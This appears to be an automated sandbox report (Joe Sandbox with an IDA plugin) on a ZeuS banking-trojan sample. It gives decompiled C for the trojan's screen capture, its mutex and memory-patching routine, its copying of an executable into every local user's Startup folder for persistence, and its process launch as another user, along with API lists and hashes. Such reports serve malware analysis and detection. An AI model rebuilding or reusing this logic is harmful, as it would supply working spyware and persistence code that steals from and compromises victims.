				_v72 = GetProcAddress(_v20, "GdipDisposeImage");
				_v40 = GetProcAddress(_v20, "GdipGetImageEncodersSize");
				_v64 = GetProcAddress(_v20, "GdipGetImageEncoders");
				_t176 = GetProcAddress(_v20, "GdipSaveImageToStream");
				_v108 = _t176;
				if(_v24 == 0 || _v80 == 0 || _v88 == 0 || _v72 == 0 || _v40 == 0 || _v64 == 0 || _t176 == 0) {
					L66:
					if(_v20 != 0) {
						FreeLibrary(_v20);
					}
					if(_v60 != 0) {
						FreeLibrary(_v60);
					}
					if(_v16 != 0) {
						FreeLibrary(_v16);
					}
					return _v32;
				} else {
					_t181 = LoadLibraryA("ole32.dll");
					_v60 = _t181;
					_t182 = GetProcAddress(_t181, "CreateStreamOnHGlobal");
					_v120 = _t182;
					if(_t182 == 0) {
						goto L66;
					}
					_t183 = LoadLibraryA("gdi32.dll");
					_v16 = _t183;
					_t262 = GetProcAddress(_t183, "CreateDCW");
					_v12 = GetProcAddress(_v16, "CreateCompatibleDC");
					_v44 = GetProcAddress(_v16, "CreateCompatibleBitmap");
					_v28 = GetProcAddress(_v16, "GetDeviceCaps");
					_v56 = GetProcAddress(_v16, "SelectObject");
					_v76 = GetProcAddress(_v16, "BitBlt");
					_v84 = GetProcAddress(_v16, "DeleteObject");
					_t191 = GetProcAddress(_v16, "DeleteDC");
					_v68 = _t191;
					if(_t262 == 0 || _v12 == 0 || _v44 == 0 || _v28 == 0 || _v56 == 0 || _v76 == 0 || _v84 == 0 || _t191 == 0) {
						goto L66;
					} else {
						_push(0);
						_push( &_v104);
						_push( &_v116);
						_v104 = 1;
						_v100 = 0;
						_v96 = 0;
						_v92 = 0;
						if(_v24() != 0) {
							goto L66;
						}
						_t268 =  *_t262(L"DISPLAY", 0, 0, 0);
						_v24 = _t268;
						if(_t268 == 0) {
							L65:
							_v80(_v116);
							goto L66;
						}
						_t197 = _v12(_t268);
						_v36 = _t197;
						if(_t197 == 0) {
							L64:
							_v68(_v24);
							goto L65;
						}
						_t199 = LoadImageW(0, 0x7f00, 2, 0, 0, 0x8040);
						_v12 = _t199;
						if(_t199 == 0) {
							L24:
							_t263 = 0;
							goto L26;
						} else {
							if(GetIconInfo(_t199,  &_v172) == 0 || GetCursorPos( &_v52) == 0) {
								_v12 = 0;
							}
							if(_v12 != 0) {
								_t263 = _a12;
								L26:
								if(_t263 == 0) {
									_t200 = _v28(_t268, 8);
									_t269 = _t200;
									_a12 = _v28(_v24, 0xa);
								} else {
									_t269 = _t263 & 0x0000ffff;
									_a12 = _t269;
								}
								_t202 = _v44(_v24, _t269, _a12);
								_v44 = _t202;
								if(_t202 == 0) {
									L63:
									_v68(_v36);
									goto L64;
								} else {
									_t204 = _v56(_v36, _t202);
									_v112 = _t204;
									if(_t204 == 0) {
										L62:
										_v84(_v44);
										goto L63;
									}
									_t206 = 0;
									_t248 = 0;
									if(_t263 != 0) {
										_t260 = (_t263 & 0x0000ffff) >> 1;
										_t206 =  <  ? 0 : _v52.x - _t260;
										_t248 =  <  ? 0 : _v52.y - _t260;
										_t81 =  &_v52;
										 *_t81 = _v52.x - _t206;
										if( *_t81 < 0) {
											_v52.x = 0;
										}
										_t84 =  &(_v52.y);
										 *_t84 = _v52.y - _t248;
										if( *_t84 < 0) {
											_v52.y = 0;
										}
									}
									_push(0x40cc0020);
									_push(_t248);
									_push(_t206);
									_push(_v24);
									_push(_a12);
									_push(_t269);
									_push(0);
									_push(0);
									_push(_v36);
									if(_v76() == 0) {
										L61:
										_v56(_v36, _v112);
										goto L62;
									} else {
										if(_v12 != 0) {
											_t254 =  <  ? 0 : _v52.x - _v172.xHotspot;
											_t239 = _v52.y - _v172.yHotspot;
											_t240 =  <  ? 0 : _t239;
											DrawIcon(_v36,  <  ? 0 : _v52.x - _v172.xHotspot,  <  ? 0 : _t239, _v12);
										}
										_push( &_v12);
										_push(0);
										_push(_v44);
										_v12 = 0;
										if(_v88() != 0 || _v12 == 0) {
											goto L61;
										} else {
											_push( &_v28);
											_push( &_a12);
											_a12 = 0;
											_v28 = 0;
											if(_v40() != 0) {
												L60:
												_v72(_v12);
												goto L61;
											}
											_t215 = _v28;
											if(_v28 == 0 || _a12 == 0) {
												goto L60;
											} else {
												_t264 = E004051B6(_t215);
												_v40 = _t264;
												if(_t264 == 0) {
													goto L60;
												}
												_push(_t264);
												_push(_v28);
												_push(_a12);
												if(_v64() != 0) {
													L52:
													E004051E6(_v40);
													if(_a12 == 0) {
														_push( &_v32);
														_push(1);
														_push(0);
														if(_v120() == 0 && _v32 != 0) {
															_v152 = 0;
															if(_a8 > 0) {
																E00405222( &_v148, 0x4035d4, 0x10);
																 *((intOrPtr*)(_t275 + _v152 * 0x1c - 0x7c)) = 4;
																 *((intOrPtr*)(_t275 + _v152 * 0x1c - 0x80)) = 1;
																 *((intOrPtr*)(_t275 + _v152 * 0x1c - 0x78)) =  &_a8;
																_v152 = _v152 + 1;
															}
															_t223 = _v108(_v12, _v32,  &_v188,  &_v152);
															_t224 = _v32;
															if(_t223 == 0) {
																 *((intOrPtr*)( *_t224 + 0x14))(_t224, 0, 0, 0, 0);
															} else {
																 *((intOrPtr*)( *_t224 + 8))(_t224);
																_v32 = 0;
															}
														}
													}
													goto L60;
												}
												_t272 = 0;
												if(_a12 <= 0) {
													goto L52;
												}
												_t265 = _t264 + 0x30;
												while(lstrcmpiW(_a4,  *_t265) != 0) {
													_t272 = _t272 + 1;
													_t265 =  &(_t265[0x13]);
													if(_t272 < _a12) {
														continue;
													}
													goto L52;
												}
												E00405222( &_v188, _t272 * 0x4c + _v40, 0x10);
												_a12 = 0;
												goto L52;
											}
										}
									}
								}
							}
							goto L24;
						}
					}
				}
			}

APIs
  • LoadLibraryA.KERNEL32(gdiplus.dll,?,?,?), ref: 0040E34E
  • GetProcAddress.KERNEL32(00000000,GdiplusStartup), ref: 0040E35F
  • GetProcAddress.KERNEL32(000001F4,GdiplusShutdown), ref: 0040E36C
  • GetProcAddress.KERNEL32(000001F4,GdipCreateBitmapFromHBITMAP), ref: 0040E379
  • GetProcAddress.KERNEL32(000001F4,GdipDisposeImage), ref: 0040E386
  • GetProcAddress.KERNEL32(000001F4,GdipGetImageEncodersSize), ref: 0040E393
  • GetProcAddress.KERNEL32(000001F4,GdipGetImageEncoders), ref: 0040E3A0
  • GetProcAddress.KERNEL32(000001F4,GdipSaveImageToStream), ref: 0040E3AD
  • LoadLibraryA.KERNEL32(ole32.dll,?,?,?), ref: 0040E3F5
  • GetProcAddress.KERNEL32(00000000,CreateStreamOnHGlobal), ref: 0040E400
  • LoadLibraryA.KERNEL32(gdi32.dll,?,?,?), ref: 0040E412
  • GetProcAddress.KERNEL32(00000000,CreateDCW), ref: 0040E41D
  • GetProcAddress.KERNEL32(?,CreateCompatibleDC), ref: 0040E429
  • GetProcAddress.KERNEL32(?,CreateCompatibleBitmap), ref: 0040E436
  • GetProcAddress.KERNEL32(?,GetDeviceCaps), ref: 0040E443
  • GetProcAddress.KERNEL32(?,SelectObject), ref: 0040E450
  • GetProcAddress.KERNEL32(?,BitBlt), ref: 0040E45D
  • GetProcAddress.KERNEL32(?,DeleteObject), ref: 0040E46A
  • GetProcAddress.KERNEL32(?,DeleteDC), ref: 0040E477
  • LoadImageW.USER32 ref: 0040E51B
  • GetIconInfo.USER32(00000000,?), ref: 0040E530
  • GetCursorPos.USER32(?,?,?,?), ref: 0040E53E
  • DrawIcon.USER32 ref: 0040E60F
  • lstrcmpiW.KERNEL32(?,-00000030,?,?,?), ref: 0040E690
  • FreeLibrary.KERNEL32(000001F4,?,?,?), ref: 0040E7A7
  • FreeLibrary.KERNEL32(?,?,?,?), ref: 0040E7B1
  • FreeLibrary.KERNEL32(?,?,?,?), ref: 0040E7BB
Strings
Memory Dump Source
  • Source File: 00000000.00000002.209100921.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
  • Associated: 00000000.00000002.209097188.0000000000400000.00000002.00020000.sdmp
  • Associated: 00000000.00000002.209116683.0000000000422000.00000004.00020000.sdmp
  • Associated: 00000000.00000002.209120393.0000000000425000.00000002.00020000.sdmp
Joe Sandbox IDA Plugin
  • Snapshot File: hcaresult_0_2_400000_ZeuS.jbxd
Similarity
  • API ID: AddressProc$Library$Load$Free$Icon$CursorDrawImageInfolstrcmpi
  • String ID: BitBlt$CreateCompatibleBitmap$CreateCompatibleDC$CreateDCW$CreateStreamOnHGlobal$DISPLAY$DeleteDC$DeleteObject$GdipCreateBitmapFromHBITMAP$GdipDisposeImage$GdipGetImageEncoders$GdipGetImageEncodersSize$GdipSaveImageToStream$GdiplusShutdown$GdiplusStartup$GetDeviceCaps$SelectObject$gdi32.dll$gdiplus.dll$ole32.dll
  • API String ID: 1554524784-1167942225
  • Opcode ID: 7b55a6904f82d42c59590c9482a1ecf1bc5bd0f1d046da0264f603548466c7bc
  • Instruction ID: 83e6845dd48db0c5ae9eba9adc6da11470be33b092abba29c1de989dde0dc0b5
  • Opcode Fuzzy Hash: 7b55a6904f82d42c59590c9482a1ecf1bc5bd0f1d046da0264f603548466c7bc
  • Instruction Fuzzy Hash: 58E1C4B1D00259ABDF209FE2CD84AAEBFB9FF04301F14483AE615B6290D7799A51CF54
Uniqueness

Uniqueness Score: -1.00%

Control-flow Graph

  • Executed
  • Not Executed
control_flow_graph 377 41d16a-41d18f call 40a402 380 41d191-41d1a7 call 41cde5 377->380 381 41d1b4-41d1bb 377->381 392 41d1a9 380->392 393 41d1ac-41d1af call 40a4aa 380->393 382 41d1c1-41d1cb call 40c4a5 381->382 383 41d29a-41d29e 381->383 387 41d45b-41d46d call 4051e6 382->387 394 41d1d1-41d1f7 call 41c946 CreateMutexW 382->394 386 41d2a4-41d2b5 call 41c97e 383->386 383->387 399 41d2bb-41d2e2 call 41c946 call 4089c9 386->399 400 41d44a-41d44e 386->400 392->393 393->381 394->387 405 41d1fd-41d20e GetLastError 394->405 412 41d2e4-41d2f5 ReadProcessMemory 399->412 413 41d30a-41d31c IsWellKnownSid 399->413 400->387 401 41d450-41d456 call 406c4b 400->401 401->387 407 41d210-41d215 CloseHandle 405->407 408 41d218-41d21b 405->408 407->408 408->387 411 41d221-41d234 call 41d56b 408->411 423 41d236 411->423 424 41d23d-41d249 call 404ff7 411->424 415 41d2f7-41d2fb 412->415 416 41d2fd-41d308 Sleep 412->416 417 41d32b-41d33c ReadProcessMemory 413->417 418 41d31e-41d326 call 40c874 413->418 415->413 415->416 416->412 421 41d398-41d3bc call 40b607 call 40c1f0 417->421 422 41d33e-41d342 417->422 430 41d442-41d445 call 4089b9 418->430 442 41d3bf-41d3c3 421->442 422->421 427 41d344-41d357 GetFileAttributesExW 422->427 423->424 433 41d258-41d279 call 41c946 OpenEventW 424->433 434 41d24b-41d252 ExitWindowsEx 424->434 427->421 431 41d359-41d396 call 40b607 call 40c55c VirtualFree 427->431 430->400 431->442 444 41d285-41d295 call 41cea2 CloseHandle 433->444 445 41d27b-41d283 SetEvent CloseHandle 433->445 434->433 442->430 446 41d3c5-41d3e1 call 406aad 442->446 444->387 445->444 446->430 452 41d3e3-41d412 call 41c946 CreateEventW 446->452 455 41d414-41d41b WaitForSingleObject 452->455 456 41d41d-41d424 WaitForMultipleObjects 452->456 457 41d42a-41d433 455->457 456->457 458 41d435-41d438 CloseHandle 457->458 459 41d43a-41d440 CloseHandle * 2 457->459 458->459 459->430
C-Code - Quality: 82%
			E0041D16A(void* __ecx, void* __eflags, void* __fp0) {
				void* __ebx;
				void* __edi;
				void* __esi;
				void* __ebp;
				void* _t74;
				void* _t79;
				intOrPtr* _t80;
				void* _t82;
				void* _t84;
				void* _t88;
				void* _t92;
				int _t100;
				int _t108;
				void* _t113;
				intOrPtr _t130;
				void* _t145;
				void* _t147;
				void* _t152;
				void* _t154;
				void* _t170;

				_t170 = __fp0;
				_t136 = __ecx;
				_t152 = _t154 - 0x70;
				_t149 = _t152 + 0x50;
				 *(_t152 + 0x6f) = 0;
				if(E0040A402(0, __ecx, _t152 + 0x50,  *0x423a0c) != 0) {
					 *(_t152 + 0x68) =  *(_t152 + 0x54);
					_t130 = E0041CDE5(_t152 + 0x68, __ecx,  *(_t152 + 0x50));
					 *((intOrPtr*)(_t152 + 0x60)) = _t130;
					if(_t130 == 0) {
						 *(_t152 + 0x68) = 0;
					}
					E0040A4AA(_t152 + 0x50);
				}
				if( *(_t152 + 0x68) != 0x1e6) {
					__eflags =  *(_t152 + 0x68) - 0xc;
					if( *(_t152 + 0x68) != 0xc) {
						L41:
						E004051E6( *((intOrPtr*)(_t152 + 0x60)));
						return  *(_t152 + 0x6f);
					}
					_t74 = E0041C97E(_t136, 0x8889347b, 2);
					 *(_t152 + 0x5c) = _t74;
					__eflags = _t74;
					if(_t74 == 0) {
						L39:
						__eflags =  *(_t152 + 0x7c) - 1;
						if( *(_t152 + 0x7c) == 1) {
							E00406C4B(0, _t149,  *0x423a0c);
						}
						goto L41;
					}
					E0041C946(0x19367401, _t152 - 0x18, 1);
					_t79 = E004089C9(_t152 - 0x18);
					_t149 = GetFileAttributesExW;
					__eflags = _t79;
					if(_t79 == 0) {
						L23:
						_t80 =  *0x4239b4;
						__imp__IsWellKnownSid( *_t80, 0x16);
						__eflags = _t80 - 1;
						if(__eflags != 0) {
							 *(_t152 + 0x6f) = 0;
							_t82 = ReadProcessMemory(0xffffffff, _t149, _t152 + 0x6f, 1, 0);
							__eflags = _t82;
							if(_t82 == 0) {
								L29:
								_push( *((intOrPtr*)( *((intOrPtr*)(_t152 + 0x60)))));
								_t84 = E0040B607(_t136, L0040C1F0,  *((intOrPtr*)( *((intOrPtr*)(_t152 + 0x60)) + 4)));
								_t149 = 0x423a10;
								 *(_t152 + 0x6f) = L0040C1F0(_t84, 0, 0x423a10, _t152 - 0x294, L0040C1F0, 0x423a10, _t170);
								L30:
								__eflags =  *(_t152 + 0x6f) - 1;
								if( *(_t152 + 0x6f) == 1) {
									_t88 = E00406AAD(_t152 - 0x294, 0, _t149, 0, _t152 + 0x4c);
									__eflags = _t88;
									 *(_t152 + 0x6f) = _t88 != 0;
									__eflags =  *(_t152 + 0x6f);
									if( *(_t152 + 0x6f) != 0) {
										E0041C946(0x1a43533f, _t152 - 0x18, 1);
										_t92 = CreateEventW(0x4239e8, 1, 0, _t152 - 0x18);
										_t145 =  *(_t152 + 0x4c);
										 *(_t152 + 0x64) = _t92;
										 *(_t152 + 0x68) = _t145;
										_push(0xffffffff);
										__eflags = _t92;
										if(_t92 != 0) {
											WaitForMultipleObjects(2, _t152 + 0x64, 0, ??);
										} else {
											WaitForSingleObject(_t145, ??);
										}
										_t149 = CloseHandle;
										__eflags =  *(_t152 + 0x64);
										if( *(_t152 + 0x64) != 0) {
											CloseHandle( *(_t152 + 0x64));
										}
										CloseHandle( *(_t152 + 0x50));
										CloseHandle(_t145);
									}
								}
								L38:
								E004089B9( *(_t152 + 0x5c));
								goto L39;
							}
							__eflags =  *(_t152 + 0x6f) - 0xe9;
							if( *(_t152 + 0x6f) != 0xe9) {
								goto L29;
							}
							_t100 = GetFileAttributesExW(0x423e1e, 0x78f16360, _t152 + 0x68);
							__eflags = _t100 - 1;
							if(_t100 != 1) {
								goto L29;
							}
							_push( *((intOrPtr*)( *((intOrPtr*)(_t152 + 0x60)))));
							E0040B607(_t136, L0040C55C,  *((intOrPtr*)( *((intOrPtr*)(_t152 + 0x60)) + 8)));
							_t149 = 0x423a10;
							 *(_t152 + 0x6f) = L0040C55C(_t152 - 0x294, 0,  *(_t152 + 0x68), 0x423a10, L0040C55C, 0x423a10, _t170, _t152 - 0x294,  *((intOrPtr*)(_t152 + 0x78)));
							VirtualFree( *(_t152 + 0x68), 0, 0x8000);
							goto L30;
						}
						 *(_t152 + 0x6f) = E0040C874(__eflags);
						goto L38;
					} else {
						goto L20;
					}
					while(1) {
						L20:
						 *(_t152 + 0x6f) = 0;
						_t108 = ReadProcessMemory(0xffffffff, _t149, _t152 + 0x6f, 1, 0);
						__eflags = _t108;
						if(_t108 == 0) {
							goto L22;
						}
						__eflags =  *(_t152 + 0x6f) - 0xe9;
						if( *(_t152 + 0x6f) == 0xe9) {
							goto L23;
						}
						L22:
						Sleep(0x1f4);
					}
				}
				if(E0040C4A5( *((intOrPtr*)(_t152 + 0x60))) != 0) {
					E0041C946(0x32901130, _t152 - 0x18, 1);
					_t113 = CreateMutexW(0x4239e8, 1, _t152 - 0x18);
					 *(_t152 + 0x7c) = _t113;
					if(_t113 != 0) {
						if(GetLastError() == 0xb7) {
							CloseHandle( *(_t152 + 0x7c));
							 *(_t152 + 0x7c) = 0;
						}
						if( *(_t152 + 0x7c) != 0) {
							E0041D56B(_t136, _t152 - 0x8c);
							if(( *(_t152 - 0x8c) & 0x00000020) != 0) {
								 *0x4239b0 =  *0x4239b0 | 0x00000010;
							}
							E00404FF7();
							if(( *0x4239b0 & 0x00000010) != 0) {
								ExitWindowsEx(0x14, 0x80000000);
							}
							E0041C946(0x1a43533f, _t152 - 0x18, 1);
							_t147 = OpenEventW(2, 0, _t152 - 0x18);
							if(_t147 != 0) {
								SetEvent(_t147);
								CloseHandle(_t147);
							}
							E0041CEA2(1);
							 *(_t152 + 0x6f) = 1;
							CloseHandle( *(_t152 + 0x7c));
						}
					}
				}
				goto L41;
			}

APIs
    • Part of subcall function 0040A402: CreateFileW.KERNEL32(?,80000000,?,00000000,00000003,00000000,00000000,?,?,?,?,0041D18D,?,?,00000000), ref: 0040A427
    • Part of subcall function 0040A402: GetFileSizeEx.KERNEL32(00000000,?,?,?,?,?,0041D18D,?,?,00000000), ref: 0040A43A
  • CreateMutexW.KERNEL32(004239E8,00000001,?,32901130,?,00000001,?,?,?,00000000), ref: 0041D1EC
  • GetLastError.KERNEL32(?,?,00000000), ref: 0041D1FD
  • CloseHandle.KERNEL32(00000001,?,?,00000000), ref: 0041D213
  • ExitWindowsEx.USER32(00000014,80000000), ref: 0041D252
  • OpenEventW.KERNEL32(00000002,00000000,?,1A43533F,?,00000001,?,?,?,00000000), ref: 0041D26F
  • SetEvent.KERNEL32(00000000,?,?,00000000), ref: 0041D27C
  • CloseHandle.KERNEL32(00000000,?,?,00000000), ref: 0041D283
  • CloseHandle.KERNEL32(00000001,00000001,?,?,00000000), ref: 0041D293
  • ReadProcessMemory.KERNEL32(000000FF,74B5F9B0,?,00000001,00000000,?,19367401,?,00000001,8889347B,00000002,?,?,00000000), ref: 0041D2F1
  • Sleep.KERNEL32(000001F4,?,?,00000000), ref: 0041D302
  • IsWellKnownSid.ADVAPI32(?,00000016,?,19367401,?,00000001,8889347B,00000002,?,?,00000000), ref: 0041D313
  • ReadProcessMemory.KERNEL32(000000FF,74B5F9B0,?,00000001,00000000,?,?,00000000), ref: 0041D338
  • VirtualFree.KERNEL32(?,00000000,00008000,?,?,?,?,?,?,00000000), ref: 0041D390
  • GetFileAttributesExW.KERNEL32(00423E1E,78F16360,?,?,?,00000000), ref: 0041D352
    • Part of subcall function 0040B607: VirtualProtect.KERNEL32(0040C1F0,?,00000040,00000000,74B5F9B0,?,?,0041D3AA,?,?,?,?,00000000), ref: 0040B61C
    • Part of subcall function 0040B607: VirtualProtect.KERNEL32(0040C1F0,?,00000000,00000000,?,?,0041D3AA,?,?,?,?,00000000), ref: 0040B64F
  • CreateEventW.KERNEL32(004239E8,00000001,00000000,?,1A43533F,?,00000001,?,?,00000000,00423A10,00000000,?,?,?), ref: 0041D3FF
  • WaitForSingleObject.KERNEL32(?,000000FF,?,?,00000000), ref: 0041D415
  • WaitForMultipleObjects.KERNEL32(00000002,?,00000000,000000FF,?,?,00000000), ref: 0041D424
  • CloseHandle.KERNEL32(?,?,?,00000000), ref: 0041D438
  • CloseHandle.KERNEL32(?,?,?,00000000), ref: 0041D43D
  • CloseHandle.KERNEL32(?,?,?,00000000), ref: 0041D440
Memory Dump Source
  • Source File: 00000000.00000002.209100921.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
  • Associated: 00000000.00000002.209097188.0000000000400000.00000002.00020000.sdmp
  • Associated: 00000000.00000002.209116683.0000000000422000.00000004.00020000.sdmp
  • Associated: 00000000.00000002.209120393.0000000000425000.00000002.00020000.sdmp
Joe Sandbox IDA Plugin
  • Snapshot File: hcaresult_0_2_400000_ZeuS.jbxd
Similarity
  • API ID: CloseHandle$CreateEventFileVirtual$MemoryProcessProtectReadWait$AttributesErrorExitFreeKnownLastMultipleMutexObjectObjectsOpenSingleSizeSleepWellWindows
  • String ID:
  • API String ID: 561470431-0
  • Opcode ID: 2e3ff7733021d977ab97b21b44bc3d7f26e8afcfeb765c59b8092d575d1be04f
  • Instruction ID: c7c2245eccef5e61c37e49668e25028ee63083f6671e90c2d451ae78b2e6f36f
  • Opcode Fuzzy Hash: 2e3ff7733021d977ab97b21b44bc3d7f26e8afcfeb765c59b8092d575d1be04f
  • Instruction Fuzzy Hash: 7991A1B1900258EFDF10EF61CD85EEE3FA9AF05314F00416AFD15A22A1C779D885CB59
Uniqueness

Uniqueness Score: -1.00%

Control-flow Graph

  • Executed
  • Not Executed
control_flow_graph 635 40c874-40c89f call 40f34a LoadLibraryW 638 40c8a5-40c8be call 40f314 GetProcAddress 635->638 639 40c93c-40c93e 635->639 643 40c930-40c93a FreeLibrary 638->643 644 40c8c0-40c8d7 638->644 640 40caae-40cab2 639->640 643->639 645 40c943-40c949 643->645 644->643 648 40c8d9-40c8ef SHGetFolderPathW 644->648 647 40c94e-40c972 NetUserEnum 645->647 649 40c974-40c979 647->649 650 40c97f-40c982 647->650 648->643 654 40c8f1-40c912 call 405d35 StrCmpNIW 648->654 649->650 651 40ca5f-40ca78 SHGetFolderPathW 649->651 652 40ca52-40ca59 650->652 653 40c988-40c98d 650->653 658 40ca7a-40ca93 call 409696 651->658 659 40caab 651->659 652->647 652->651 655 40c993-40c9a8 NetUserGetInfo 653->655 656 40ca49-40ca4c NetApiBufferFree 653->656 654->643 665 40c914-40c92c call 405587 654->665 660 40c9ae-40c9b3 655->660 661 40ca3f-40ca43 655->661 656->652 658->659 669 40ca95-40caa5 call 40bfbb 658->669 659->640 660->661 664 40c9b9-40c9ca call 41c086 660->664 661->655 661->656 673 40ca36-40ca39 NetApiBufferFree 664->673 674 40c9cc-40c9e1 call 40aa77 664->674 665->643 669->659 676 40caa7 669->676 673->661 674->673 679 40c9e3-40c9f1 call 40a7f9 674->679 676->659 679->673 682 40c9f3-40ca0c call 409696 679->682 682->673 685 40ca0e-40ca1e call 40bfbb 682->685 685->673 688 40ca20-40ca31 call 40c0e8 685->688 688->673
C-Code - Quality: 81%
			E0040C874(void* __eflags) {
				char _v5;
				char* _v12;
				char _v16;
				int _v20;
				int _v24;
				int _v28;
				int _v32;
				char _v56;
				char _v88;
				char _v608;
				short _v1128;
				char _v1648;
				void* __edi;
				void* __esi;
				_Unknown_base(*)()* _t63;
				int _t69;
				char _t70;
				char _t76;
				int _t80;
				char _t81;
				char _t82;
				char _t86;
				char _t88;
				WCHAR* _t98;
				int _t99;
				CHAR* _t110;
				char* _t111;
				WCHAR* _t112;
				struct HINSTANCE__* _t113;
				signed int _t114;
				void* _t115;

				_t112 =  &_v56;
				_v5 = 0;
				E0040F34A(0xe1, _t112);
				_t113 = LoadLibraryW(_t112);
				if(_t113 == 0) {
					L7:
					return 0;
				} else {
					_t110 =  &_v88;
					E0040F314(0xe2, _t110);
					_t63 = GetProcAddress(_t113, _t110);
					if(_t63 != 0) {
						_push( &_v12);
						_t106 =  &_v608;
						_push( &_v608);
						_v12 = 0x104;
						if( *_t63() == 1) {
							_t98 =  &_v1128;
							__imp__SHGetFolderPathW(0, 7, 0xffffffff, 1, _t98);
							if(_t98 == 0) {
								_t106 =  &_v608;
								_t99 = E00405D35(_t106);
								_v12 = _t99;
								if(StrCmpNIW(_t106,  &_v1128, _t99) == 0) {
									_t106 = _t115 + _v12 * 2 - 0x464;
									E00405587(_t102 | 0xffffffff, _t115 + _v12 * 2 - 0x464,  &_v1128);
									_v5 = 1;
								}
							}
						}
					}
					FreeLibrary(_t113);
					if(_v5 != 0) {
						_v5 = 0;
						_v28 = 0;
						_t111 = L".exe";
						do {
							_v12 = 0;
							_t69 = NetUserEnum(0, 0, 2,  &_v12, 0xffffffff,  &_v20,  &_v32,  &_v28);
							_v24 = _t69;
							__eflags = _t69;
							if(_t69 == 0) {
								L11:
								__eflags = _v12;
								if(_v12 == 0) {
									goto L24;
								}
								_t114 = 0;
								__eflags = _v20;
								if(_v20 <= 0) {
									L23:
									NetApiBufferFree(_v12);
									goto L24;
								} else {
									goto L13;
								}
								do {
									L13:
									_t80 = NetUserGetInfo(0,  *(_v12 + _t114 * 4), 0x17,  &_v16);
									__eflags = _t80;
									if(_t80 == 0) {
										_t81 = _v16;
										__eflags = _t81;
										if(_t81 != 0) {
											_t106 =  &_v608;
											_t82 = E0041C086( *((intOrPtr*)(_t81 + 0x10)),  &_v608);
											__eflags = _t82;
											if(_t82 != 0) {
												_t86 = E0040AA77( &_v1128,  &_v608,  &_v608);
												__eflags = _t86;
												if(_t86 != 0) {
													_t88 = E0040A7F9( &_v608);
													__eflags = _t88;
													if(_t88 != 0) {
														__eflags = E00409696(0,  &_v608,  &_v1648, _t111, 6);
														if(__eflags != 0) {
															__eflags = E0040BFBB( &_v608, __eflags, 0,  &_v1648, 0);
															if(__eflags != 0) {
																_v5 = 1;
																E0040C0E8( &_v608, __eflags,  *((intOrPtr*)(_v16 + 0x10)),  &_v1648);
															}
														}
													}
												}
											}
											NetApiBufferFree(_v16);
										}
									}
									_t114 = _t114 + 1;
									__eflags = _t114 - _v20;
								} while (_t114 < _v20);
								goto L23;
							}
							__eflags = _t69 - 0xea;
							if(_t69 != 0xea) {
								break;
							}
							goto L11;
							L24:
							__eflags = _v24 - 0xea;
						} while (_v24 == 0xea);
						_t70 =  &_v1128;
						__imp__SHGetFolderPathW(0, 0x8007, 0xffffffff, 1, _t70);
						__eflags = _t70;
						if(_t70 == 0) {
							__eflags = E00409696(0,  &_v1128,  &_v1648, _t111, 6);
							if(__eflags != 0) {
								_t76 = E0040BFBB(_t106, __eflags, 0,  &_v1648, 0);
								__eflags = _t76;
								if(_t76 != 0) {
									_v5 = 1;
								}
							}
						}
						return _v5;
					}
					goto L7;
				}
			}

APIs
  • LoadLibraryW.KERNEL32(?,74B05B60,74B5F9B0,00000000), ref: 0040C895
  • GetProcAddress.KERNEL32(00000000,?), ref: 0040C8B6
  • SHGetFolderPathW.SHELL32(00000000,00000007,000000FF,00000001,?), ref: 0040C8E7
  • StrCmpNIW.SHLWAPI(?,?,00000000), ref: 0040C90A
  • FreeLibrary.KERNEL32(00000000), ref: 0040C931
  • NetUserEnum.NETAPI32(00000000,00000000,00000002,?,000000FF,0041D323,?,?), ref: 0040C967
  • NetUserGetInfo.NETAPI32(00000000,?,00000017,?), ref: 0040C9A0
  • NetApiBufferFree.NETAPI32(?,?,?), ref: 0040CA39
  • NetApiBufferFree.NETAPI32(?), ref: 0040CA4C
  • SHGetFolderPathW.SHELL32(00000000,00008007,000000FF,00000001,?), ref: 0040CA70
Strings
Memory Dump Source
  • Source File: 00000000.00000002.209100921.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
  • Associated: 00000000.00000002.209097188.0000000000400000.00000002.00020000.sdmp
  • Associated: 00000000.00000002.209116683.0000000000422000.00000004.00020000.sdmp
  • Associated: 00000000.00000002.209120393.0000000000425000.00000002.00020000.sdmp
Joe Sandbox IDA Plugin
  • Snapshot File: hcaresult_0_2_400000_ZeuS.jbxd
Similarity
  • API ID: Free$BufferFolderLibraryPathUser$AddressEnumInfoLoadProc
  • String ID: .exe
  • API String ID: 1753652487-4119554291
  • Opcode ID: d3c765340168a9e393e3f8b149566e5ab4d2309495054281dedccc913e500f4b
  • Instruction ID: 0bd764c93ded1e10a5683304505b9111ed39ebe2035ab0ac5c7e94a467407a02
  • Opcode Fuzzy Hash: d3c765340168a9e393e3f8b149566e5ab4d2309495054281dedccc913e500f4b
  • Instruction Fuzzy Hash: 7A614FB1900258AFDF20DB94CC84FEEB7BDAB45304F0046BAB511F21D1D7399A498B68
Uniqueness

Uniqueness Score: -1.00%

C-Code - Quality: 58%
			E00406B08(void* _a4, WCHAR* _a8) {
				WCHAR* _v5;
				char _v12;
				signed int _v16;
				struct HINSTANCE__* _v20;
				_Unknown_base(*)()* _v24;
				struct _PROCESS_INFORMATION _v40;
				struct _STARTUPINFOW _v108;
				struct HINSTANCE__* _t28;
				_Unknown_base(*)()* _t31;
				WCHAR* _t49;
				long _t50;
				intOrPtr* _t52;

				_v5 = 0;
				_t28 = LoadLibraryA("userenv.dll");
				_v20 = _t28;
				if(_t28 != 0) {
					_t52 = GetProcAddress(_t28, "CreateEnvironmentBlock");
					_t31 = GetProcAddress(_v20, "DestroyEnvironmentBlock");
					_v24 = _t31;
					if(_t52 != 0 && _t31 != 0) {
						_push(0);
						_push(_a4);
						_push( &_v16);
						_v16 = 0;
						if( *_t52() == 0) {
							_v16 = 0;
						}
						_t50 = 0x44;
						_v12 = 0;
						E00405299( &_v108,  &_v108, 0, _t50);
						_t49 = _a8;
						_v108.cb = _t50;
						_v108.lpDesktop = 0;
						if(_t49 == 0) {
							_t49 =  &_v12;
						}
						asm("sbb eax, eax");
						if(CreateProcessAsUserW(_a4, 0, _t49, 0, 0, 0,  ~_v16 & 0x00000400 | 0x04000000, _v16, 0,  &_v108,  &_v40) != 0) {
							CloseHandle(_v40.hThread);
							CloseHandle(_v40);
							_v5 = _v40.dwProcessId != 0;
						}
						if(_v16 != 0) {
							_v24(_v16);
						}
					}
					FreeLibrary(_v20);
				}
				return _v5 & 0x000000ff;
			}

APIs
